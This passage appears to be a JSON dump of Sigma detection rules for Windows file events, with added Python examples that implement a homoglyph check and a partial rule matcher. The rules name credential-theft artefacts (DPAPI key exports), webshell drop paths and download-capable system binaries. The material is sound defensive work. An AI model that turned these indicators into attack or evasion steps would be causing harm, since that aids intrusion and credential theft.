    "content": "title: Suspicious Double Extension Files\nid: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e\nrelated:\n    - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8\n      type: derived\n    - id: 3215aa19-f060-4332-86d5-5602511f3ca8\n      type: similar\nstatus: test\ndescription: Detects dropped files with double extensions, a technique often used by malware to abuse the fact that Windows hides known file extensions by default.\nreferences:\n    - https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/\n    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations\n    - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles\n    - https://twitter.com/malwrhunterteam/status/1235135745611960321\n    - https://twitter.com/luc4m/status/1073181154126254080\n    - https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\n    - https://vipre.com/blog/svg-phishing-attacks-the-new-trick-in-the-cybercriminals-playbook/\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2022-06-19\nmodified: 2025-07-22\ntags:\n    - attack.defense-evasion\n    - attack.t1036.007\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_gen:\n        TargetFilename|endswith:\n            - '.exe'\n            - '.iso'\n            - '.rar'\n            - '.svg'\n            - '.zip'\n            # - '.lnk'  # legitimate links can be created anywhere\n        TargetFilename|contains:\n            - '.doc.'\n            - '.docx.'\n            - '.gif.'\n            - '.jpeg.'\n            - '.jpg.'\n            - '.mp3.'\n            - '.mp4.'\n            - '.pdf.'\n            - '.png.'\n            - '.ppt.'\n            - '.pptx.'\n            - '.rtf.'\n            - '.svg.'\n            - '.txt.'\n            - '.xls.'\n            - '.xlsx.'\n    selection_exe:\n        TargetFilename|endswith:\n            - '.rar.exe'\n            - '.zip.exe'\n    # Note: If you want to keep using the \".lnk\" extension, you might uncomment this filter and add additional locations\n    # filter_main_lnk:\n    #     TargetFilename|contains:\n    #         - '\\AppData\\Roaming\\Microsoft\\Office\\Recent\\'\n    #         - '\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml",
    "content": "title: DPAPI Backup Keys And Certificate Export Activity IOC\nid: 7892ec59-c5bb-496d-8968-e5d210ca3ac4\nstatus: test\ndescription: |\n    Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.\nreferences:\n    - https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/\n    - https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32\nauthor: Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-26\ntags:\n    - attack.credential-access\n    - attack.t1555\n    - attack.t1552.004\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - 'ntds_capi_'\n            - 'ntds_legacy_'\n            - 'ntds_unknown_'\n        TargetFilename|endswith:\n            - '.cer'\n            - '.key'\n            - '.pfx'\n            - '.pvk'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml",
    "content": "title: Suspicious MSExchangeMailboxReplication ASPX Write\nid: 7280c9f3-a5af-45d0-916a-bc01cb4151c9\nstatus: test\ndescription: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation\nreferences:\n    - https://redcanary.com/blog/blackbyte-ransomware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-25\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\MSExchangeMailboxReplication.exe'\n        TargetFilename|endswith:\n            - '.aspx'\n            - '.asp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_executable_creation.yml",
    "content": "title: Suspicious Executable File Creation\nid: 74babdd6-a758-4549-9632-26535279e654\nstatus: test\ndescription: |\n    Detect creation of suspicious executable file names.\n    Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.\nreferences:\n    - https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae\n    - https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/\nauthor: frack113\ndate: 2022-09-05\nmodified: 2023-12-11\ntags:\n    - attack.defense-evasion\n    - attack.t1564\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - ':\\$Recycle.Bin.exe'\n            - ':\\Documents and Settings.exe'\n            - ':\\MSOCache.exe'\n            - ':\\PerfLogs.exe'\n            - ':\\Recovery.exe'\n            - '.bat.exe'\n            - '.sys.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_file_write_in_webapps_root.yml",
    "content": "title: Suspicious File Write to Webapps Root Directory\nid: 89c42960-f244-4dad-9151-ae9b1a3287a2\nstatus: experimental\ndescription: |\n    Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.\n    This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.\nreferences:\n    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-20\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    # Add more suspicious processes or paths or extensions as needed\n    selection_susp_img:\n        Image|endswith:\n            - '\\dotnet.exe'\n            - '\\w3wp.exe'\n            - '\\java.exe'\n    selection_servers:\n        TargetFilename|contains:\n            - '\\apache'\n            - '\\tomcat'\n    selection_path:\n        TargetFilename|contains: '\\webapps\\ROOT\\'\n    selection_susp_extensions:\n        TargetFilename|endswith: '.jsp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_filewrite_in_sharepoint_layouts_dir.yml",
    "content": "title: Suspicious File Write to SharePoint Layouts Directory\nid: 1f0489be-b496-4ddf-b3a9-5900f2044e9c\nstatus: experimental\ndescription: |\n    Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation.\n    This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.\nreferences:\n    - https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/\n    - https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-24\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\w3wp.exe'\n        TargetFilename|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\'\n            - 'C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\'\n        TargetFilename|contains:\n            - '\\15\\TEMPLATE\\LAYOUTS\\'\n            - '\\16\\TEMPLATE\\LAYOUTS\\'\n        TargetFilename|endswith:\n            - '.asax'\n            - '.ascx'\n            - '.ashx'\n            - '.asmx'\n            - '.asp'\n            - '.aspx'\n            - '.bat'\n            - '.cmd'\n            - '.cer'\n            - '.config'\n            - '.hta'\n            - '.js'\n            - '.jsp'\n            - '.jspx'\n            - '.php'\n            - '.ps1'\n            - '.vbs'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_get_variable.yml",
    "content": "title: Suspicious Get-Variable.exe Creation\nid: 0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b\nstatus: test\ndescription: |\n    Get-Variable is a valid PowerShell cmdlet.\n    The WindowsApps folder is in the user's PATH by default.\n    So when the Get-Variable command is issued on PowerShell execution, the system first looks for a Get-Variable executable in the PATH and executes the malicious binary instead of looking for the PowerShell cmdlet.\nreferences:\n    - https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\n    - https://www.joesandbox.com/analysis/465533/0/html\nauthor: frack113\ndate: 2022-04-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: 'Local\\Microsoft\\WindowsApps\\Get-Variable.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml",
    "content": "title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream\nid: a8f866e1-bdd4-425e-a27a-37619238d9c7\nrelated:\n    - id: 0900463c-b33b-49a8-be1d-552a3b553dae\n      type: similar\nstatus: test\ndescription: |\n    Detects the creation of a hidden file or folder via the \"::$index_allocation\" stream, which can be used as a technique to prevent access to folders and files from tooling such as \"explorer.exe\" and \"powershell.exe\"\nreferences:\n    - https://twitter.com/pfiatde/status/1681977680688738305\n    - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/\n    - https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/\n    - https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3\nauthor: Scoubi (@ScoubiMtl)\ndate: 2023-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        # Note: Both Sysmon and ETW are unable to log the presence of such streams in the CommandLine. But EDRs such as Crowdstrike are able to use e.g. CMD console history. Users are advised to test this before usage\n        TargetFilename|contains: '::$index_allocation'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml",
    "content": "title: Potential Homoglyph Attack Using Lookalike Characters in Filename\nid: 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6\nstatus: test\ndescription: |\n    Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\n    This is used as an obfuscation and masquerading technique. Only \"perfect\" homoglyphs are included; these are characters that\n    are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\nreferences:\n    - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish\n    - http://www.irongeek.com/homoglyph-attack-generator.php\nauthor: Micah Babinski, @micahbabinski\ndate: 2023-05-08\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1036.003\n    # - attack.t1036.008\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_upper:\n        TargetFilename|contains:\n            - \"\\u0410\" # А/A\n            - \"\\u0412\" # В/B\n            - \"\\u0415\" # Е/E\n            - \"\\u041a\" # К/K\n            - \"\\u041c\" # М/M\n            - \"\\u041d\" # Н/H\n            - \"\\u041e\" # О/O\n            - \"\\u0420\" # Р/P\n            - \"\\u0421\" # С/C\n            - \"\\u0422\" # Т/T\n            - \"\\u0425\" # Х/X\n            - \"\\u0405\" # Ѕ/S\n            - \"\\u0406\" # І/I\n            - \"\\u0408\" # Ј/J\n            - \"\\u04ae\" # Ү/Y\n            - \"\\u04c0\" # Ӏ/I\n            - \"\\u050C\" # Ԍ/G\n            - \"\\u051a\" # Ԛ/Q\n            - \"\\u051c\" # Ԝ/W\n            - \"\\u0391\" # Α/A\n            - \"\\u0392\" # Β/B\n            - \"\\u0395\" # Ε/E\n            - \"\\u0396\" # Ζ/Z\n            - \"\\u0397\" # Η/H\n            - \"\\u0399\" # Ι/I\n            - \"\\u039a\" # Κ/K\n            - \"\\u039c\" # Μ/M\n            - \"\\u039d\" # Ν/N\n            - \"\\u039f\" # Ο/O\n            - \"\\u03a1\" # Ρ/P\n            - \"\\u03a4\" # Τ/T\n            - \"\\u03a5\" # Υ/Y\n            - \"\\u03a7\" # Χ/X\n    selection_lower:\n        TargetFilename|contains:\n            - \"\\u0430\" # а/a\n            - \"\\u0435\" # е/e\n            - \"\\u043e\" # о/o\n            - \"\\u0440\" # р/p\n            - \"\\u0441\" # с/c\n            - \"\\u0445\" # х/x\n            - \"\\u0455\" # ѕ/s\n            - \"\\u0456\" # і/i\n            - \"\\u04cf\" # ӏ/l\n            - \"\\u0458\" # ј/j\n            - \"\\u04bb\" # һ/h\n            - \"\\u0501\" # ԁ/d\n            - \"\\u051b\" # ԛ/q\n            - \"\\u051d\" # ԝ/w\n            - \"\\u03bf\" # ο/o\n    condition: 1 of selection_*\nfalsepositives:\n    - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.\nlevel: medium\n"
  },
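Added example, not code from the Sigma project: a Python check that applies the homoglyph rule's character lists to a filename, reports each lookalike with its Unicode name and the ASCII letter it impersonates, renders the name the way a human reads it, and shows that NFKC normalization does not undo the substitution (Cyrillic and Greek letters have no compatibility mapping to Latin, so a confusables table such as the rule's lists is required). The `HOMOGLYPHS` table is transcribed from `selection_upper` and `selection_lower` above; the function names and the sample filenames are constructed for this example.

```python
"""Added example: detect the lookalike characters the homoglyph rule lists, show the
ASCII the analyst believes they are reading, and demonstrate that Unicode
normalization does not undo the substitution."""
import unicodedata

# Code point -> ASCII twin, transcribed from the rule's selection_upper / selection_lower.
HOMOGLYPHS = {
    # Cyrillic capitals
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M", "\u041d": "H",
    "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T", "\u0425": "X", "\u0405": "S",
    "\u0406": "I", "\u0408": "J", "\u04ae": "Y", "\u04c0": "I", "\u050c": "G", "\u051a": "Q",
    "\u051c": "W",
    # Greek capitals
    "\u0391": "A", "\u0392": "B", "\u0395": "E", "\u0396": "Z", "\u0397": "H", "\u0399": "I",
    "\u039a": "K", "\u039c": "M", "\u039d": "N", "\u039f": "O", "\u03a1": "P", "\u03a4": "T",
    "\u03a5": "Y", "\u03a7": "X",
    # Cyrillic and Greek small letters
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c", "\u0445": "x",
    "\u0455": "s", "\u0456": "i", "\u04cf": "l", "\u0458": "j", "\u04bb": "h", "\u0501": "d",
    "\u051b": "q", "\u051d": "w", "\u03bf": "o",
}


def find_homoglyphs(name: str) -> list:
    """[(index, char, unicode name, ASCII lookalike)] for every listed homoglyph in name."""
    return [(i, ch, unicodedata.name(ch), HOMOGLYPHS[ch])
            for i, ch in enumerate(name) if ch in HOMOGLYPHS]


def is_suspicious(name: str) -> bool:
    """Equivalent of the rule's '1 of selection_*': any listed character anywhere in the name."""
    return bool(find_homoglyphs(name))


def as_seen(name: str) -> str:
    """The name as a human reads it: every homoglyph replaced by its ASCII twin."""
    return "".join(HOMOGLYPHS.get(ch, ch) for ch in name)


def nfkc_changes(name: str) -> bool:
    """True if NFKC normalization alters the name. Cyrillic and Greek letters have no
    compatibility mapping to Latin, so this stays False for these homoglyphs: a
    confusables table like the one above is required; normalization is not enough."""
    return unicodedata.normalize("NFKC", name) != name


# Constructed sample names (not taken from any report).
SAMPLES = [
    "Inv\u043eice_2024.pdf.exe",            # Cyrillic 'о' at index 3; reads as Invoice_2024.pdf.exe
    "\u0421hrome_Setup.exe",                # Cyrillic 'С' at index 0; reads as Chrome_Setup.exe
    "Invoice_2024.pdf",                     # pure ASCII, no alert
    "\u041e\u0442\u0447\u0451\u0442.docx",  # genuine Cyrillic text: the false positive the rule warns about
]

if __name__ == "__main__":
    for n in SAMPLES:
        print(is_suspicious(n), repr(n), "->", as_seen(n), find_homoglyphs(n))
```

The last sample is the rule's stated false-positive shape: a legitimately Cyrillic filename trips `selection_upper` on its first letter alone, which is why the rule ships at medium and needs per-region tuning.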
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml",
    "content": "title: Legitimate Application Dropped Archive\nid: 654fcc6d-840d-4844-9b07-2c3300e54a26\nstatus: test\ndescription: Detects programs on a Windows system that should not write an archive to disk\nreferences:\n    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326\nauthor: frack113, Florian Roth\ndate: 2022-08-21\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            # Microsoft Office Programs Dropping Executables\n            - \\winword.exe\n            - \\excel.exe\n            - \\powerpnt.exe\n            - \\msaccess.exe\n            - \\mspub.exe\n            - \\eqnedt32.exe\n            - \\visio.exe\n            - \\wordpad.exe\n            - \\wordview.exe\n            # LOLBINs that can be used to download executables\n            - \\certutil.exe\n            - \\certoc.exe\n            - \\CertReq.exe\n            # - \\bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)\n            - \\Desktopimgdownldr.exe\n            - \\esentutl.exe\n            # - \\expand.exe\n            - \\finger.exe\n            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)\n            - \\notepad.exe\n            - \\AcroRd32.exe\n            - \\RdrCEF.exe\n            - \\mshta.exe\n            - \\hh.exe\n        TargetFilename|endswith:\n            - '.zip'\n            - '.rar'\n            - '.7z'\n            - '.diagcab'\n            - '.appx'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml",
    "content": "title: Legitimate Application Dropped Executable\nid: f0540f7e-2db3-4432-b9e0-3965486744bc\nstatus: test\ndescription: Detects programs on a Windows system that should not write executables to disk\nreferences:\n    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-08-21\nmodified: 2023-06-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4\n            - '\\eqnedt32.exe'\n            - '\\wordpad.exe'\n            - '\\wordview.exe'\n            # LOLBINs that can be used to download executables\n            - '\\certutil.exe'\n            - '\\certoc.exe'\n            - '\\CertReq.exe'\n            # - \\bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)\n            - '\\Desktopimgdownldr.exe'\n            - '\\esentutl.exe'\n            # - \\expand.exe\n            - '\\mshta.exe'\n            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)\n            - '\\AcroRd32.exe'\n            - '\\RdrCEF.exe'\n            - '\\hh.exe'\n            - '\\finger.exe'\n        TargetFilename|endswith:\n            - '.exe'\n            - '.dll'\n            - '.ocx'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location.yml",
    "content": "title: Legitimate Application Writing Files In Uncommon Location\nid: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67\nrelated:\n    - id: 2ddef153-167b-4e89-86b6-757a9e65dcac # bitsadmin dedicated rule\n      type: similar\nstatus: experimental\ndescription: |\n    Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution.\n    Adversaries may leverage legitimate applications (Living off the Land Binaries - LOLBins) to drop or download malicious files to uncommon locations on the system to evade detection by security solutions.\nreferences:\n    - https://lolbas-project.github.io/#/download\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_img:\n        Image|endswith:\n            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4\n            - '\\eqnedt32.exe'\n            - '\\wordpad.exe'\n            - '\\wordview.exe'\n            # LOLBINs that can be used to download executables\n            - '\\cmdl32.exe'\n            - '\\certutil.exe'\n            - '\\certoc.exe'\n            - '\\CertReq.exe'\n            - '\\bitsadmin.exe'\n            - '\\Desktopimgdownldr.exe'\n            - '\\esentutl.exe'\n            - '\\expand.exe'\n            - '\\extrac32.exe'\n            - '\\replace.exe'\n            - '\\mshta.exe'\n            - '\\ftp.exe'\n            - '\\Ldifde.exe'\n            - '\\RdrCEF.exe'\n            - '\\hh.exe'\n            - '\\finger.exe'\n            - '\\findstr.exe'\n    selection_locations:\n        TargetFilename|contains:\n            - ':\\Perflogs'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\'\n            - '\\$Recycle.Bin\\'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Contacts\\'\n            - '\\Desktop\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\inetpub\\wwwroot\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\Start Menu\\Programs\\Startup\\'\n            - '\\Users\\Default\\'\n            - '\\Videos\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml",
    "content": "title: Legitimate Application Dropped Script\nid: 7d604714-e071-49ff-8726-edeb95a70679\nstatus: test\ndescription: Detects programs on a Windows system that should not write scripts to disk\nreferences:\n    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-08-21\nmodified: 2023-06-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4\n            - \\eqnedt32.exe\n            - \\wordpad.exe\n            - \\wordview.exe\n            # LOLBINs that can be used to download executables\n            - \\certutil.exe\n            - \\certoc.exe\n            - \\CertReq.exe\n            # - \\bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)\n            - \\Desktopimgdownldr.exe\n            - \\esentutl.exe\n            # - \\expand.exe\n            - '\\mshta.exe'\n            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)\n            - '\\AcroRd32.exe'\n            - '\\RdrCEF.exe'\n            - '\\hh.exe'\n            - '\\finger.exe'\n        TargetFilename|endswith:\n            - '.ps1'\n            - '.bat'\n            - '.vbs'\n            - '.scf'\n            - '.wsf'\n            - '.wsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml",
    "content": "title: Suspicious LNK Double Extension File Created\nid: 3215aa19-f060-4332-86d5-5602511f3ca8\nrelated:\n    - id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e\n      type: derived\nstatus: test\ndescription: |\n    Detects the creation of files with \".lnk\" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the \".lnk\" extension by default.\nreferences:\n    - https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/\n    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations\n    - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles\n    - https://twitter.com/malwrhunterteam/status/1235135745611960321\n    - https://twitter.com/luc4m/status/1073181154126254080\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2022-11-07\nmodified: 2023-10-18\ntags:\n    - attack.defense-evasion\n    - attack.t1036.007\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '.lnk'\n        TargetFilename|contains:\n            - '.doc.'\n            - '.docx.'\n            - '.jpg.'\n            - '.pdf.'\n            - '.ppt.'\n            - '.pptx.'\n            - '.xls.'\n            - '.xlsx.'\n    filter_main_recent:\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\'\n    filter_optional_office_recent:\n        Image|endswith:\n            # Note: Some additional office applications might need to be added\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\Office\\Recent\\'\n    filter_optional_office_excel:\n        Image|endswith: '\\excel.exe'\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\Excel'\n    filter_optional_office_powerpoint:\n        Image|endswith: '\\powerpnt.exe'\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\PowerPoint'\n    filter_optional_office_word:\n        Image|endswith: '\\winword.exe'\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\Word'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Some tuning is required for other general purpose directories of third party apps\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml\n"
  },
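Added example, mine and not code from the Sigma project: a small Python matcher that reproduces the Sigma semantics the two double-extension rules above rely on (`contains`/`endswith` are case-insensitive substring tests, list values are OR'ed, the fields of one selection are AND'ed, `1 of selection_*` is an OR over named selections, and the LNK rule's `selection and not 1 of filter_main_* and not 1 of filter_optional_*` subtracts its filters) and runs both detections over constructed Sysmon Event ID 11 records. The rule transcriptions, the `any_of` helper and the sample paths are assumptions of this example; a real deployment goes through pySigma or sigma-cli and a backend, not this code. It also shows why `selection_exe` exists in the first rule: `photos.zip.exe` contains no fragment from the `contains` list (`.zip.` is not in it), so only the dedicated `.zip.exe` suffix catches it, and why the Excel filter in the LNK rule is keyed on `Image`: the same `.xlsx.lnk` under `\AppData\Roaming\Microsoft\Excel\` is suppressed when `excel.exe` writes it but still alerts when `cmd.exe` does.

```python
"""Added example: a minimal evaluator for the Sigma subset used by the two
double-extension rules above, run over constructed Sysmon Event ID 11 records.
This is not Sigma's own engine (pySigma/sigma-cli); it is a hand-written
matcher that reproduces the semantics the rules rely on."""


# Sigma string matching is case-insensitive; list values are OR'ed and the
# fields of one selection are AND'ed.
def _match(value: str, modifier: str, pattern: str) -> bool:
    v, p = value.lower(), pattern.lower()
    if modifier == "contains":
        return p in v
    if modifier == "endswith":
        return v.endswith(p)
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "":
        return v == p
    raise ValueError("unsupported modifier: " + modifier)


def selection_matches(selection: dict, event: dict) -> bool:
    """True when every 'Field|modifier' entry of the selection hits the event."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        if value is None:
            return False
        if isinstance(patterns, str):
            patterns = [patterns]
        if not any(_match(value, modifier, p) for p in patterns):
            return False
    return True


def any_of(hits: dict, prefix: str) -> bool:
    """Sigma '1 of <prefix>*' over the per-selection results."""
    return any(hit for name, hit in hits.items() if name.startswith(prefix))


# Detection sections transcribed from the two rules; conditions are Python
# callables over the per-selection results instead of a condition parser.
RULES = [
    {
        "title": "Suspicious Double Extension Files",
        "detection": {
            "selection_gen": {
                "TargetFilename|endswith": [".exe", ".iso", ".rar", ".svg", ".zip"],
                "TargetFilename|contains": [
                    ".doc.", ".docx.", ".gif.", ".jpeg.", ".jpg.", ".mp3.", ".mp4.", ".pdf.",
                    ".png.", ".ppt.", ".pptx.", ".rtf.", ".svg.", ".txt.", ".xls.", ".xlsx.",
                ],
            },
            "selection_exe": {"TargetFilename|endswith": [".rar.exe", ".zip.exe"]},
        },
        "condition": lambda h: any_of(h, "selection_"),  # 1 of selection_*
    },
    {
        "title": "Suspicious LNK Double Extension File Created",
        "detection": {
            "selection": {
                "TargetFilename|endswith": ".lnk",
                "TargetFilename|contains": [".doc.", ".docx.", ".jpg.", ".pdf.", ".ppt.", ".pptx.", ".xls.", ".xlsx."],
            },
            "filter_main_recent": {"TargetFilename|contains": "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"},
            "filter_optional_office_recent": {
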